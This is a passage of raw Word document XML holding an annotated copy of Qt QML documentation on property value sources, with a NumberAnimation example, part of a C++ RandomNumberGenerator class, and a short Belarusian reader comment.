      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the value of a property over time. Clients </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can define their own</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> property value source types. The various</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId257" w:history="1">
        <w:r w:rsidRPr="00A61423">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property animation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types provided by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QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import are examples of property value sources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B7F34" w:rsidRPr="003B7F34" w:rsidRDefault="003B7F34" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">трошку не зразумеў адрозненне </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> ад </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Animation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>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Property modifier type instances can be created and applied to a property of a QML object through the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&lt;ModifierType&gt; on &lt;propertyName&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" syntax, as the following example shows:</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import</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QtQuick</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2.0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Item</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width</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400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height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50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Rectangle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width</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50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height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50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color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"red"</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NumberAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on x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from</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to</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350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loops</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Animation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Infinite</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duration</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2000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A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clients</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can register their own property value source types, but currently </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not property value write interceptors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00FA192B">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="307" w:name="property-value-sources"/>
      <w:bookmarkStart w:id="308" w:name="_Toc483000597"/>
      <w:bookmarkStart w:id="309" w:name="_Toc483603950"/>
      <w:bookmarkStart w:id="310" w:name="_Toc483605170"/>
      <w:bookmarkEnd w:id="307"/>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property Value Sources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="308"/>
      <w:bookmarkEnd w:id="309"/>
      <w:bookmarkEnd w:id="310"/>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i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property value sources</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are QML types that can automatically update the value of a property over time, using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&lt;PropertyValueSource&gt; on &lt;property&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax. For example, the various</w:t>
      </w:r>
      <w:r w:rsidR="00FA192B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId258" w:history="1">
        <w:r w:rsidRPr="00A61423">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property animation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FA192B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided by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QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module are examples of property value sources.</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A property value source can be implemented in C++ by </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subclassing</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId259" w:history="1">
        <w:r w:rsidRPr="00A61423">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlPropertyValueSource</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and providing an implementation that writes different values to a property over time. When the property value source is applied to a property using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&lt;PropertyValueSource&gt; on &lt;property&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">syntax in QML, it is given a reference to this property </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>by the engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that the property value can be updated.</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, suppose there is a</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RandomNumberGenerator</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class to be made available as a property value source, so that when applied to a QML property, it will update the property value to a different random number every 500 milliseconds. Additionally, a maxValue can be provided to this random number generator. This class can be implemented as follows:</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class</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RandomNumberGenerator</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public</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QObject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public</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QQmlPropertyValueSource</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Q_OBJECT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Q_INTERFACES</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlPropertyValueSource</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Q_PROPERTY</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> maxValue READ maxValue WRITE setMaxValue NOTIFY maxValueChanged</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public</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RandomNumberGenerator</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QObject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parent</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QObject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parent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m_maxValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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qsrand</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QDateTime</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currentMSecsSinceEpoch</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1000</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QObject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connect</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>m_timer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SIGNAL</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timeout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SLOT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updateProperty</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m_timer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start</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>500</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> maxValue</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const</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setMaxValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> maxValue</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virtual</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setTarget</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const</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QQmlProperty</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
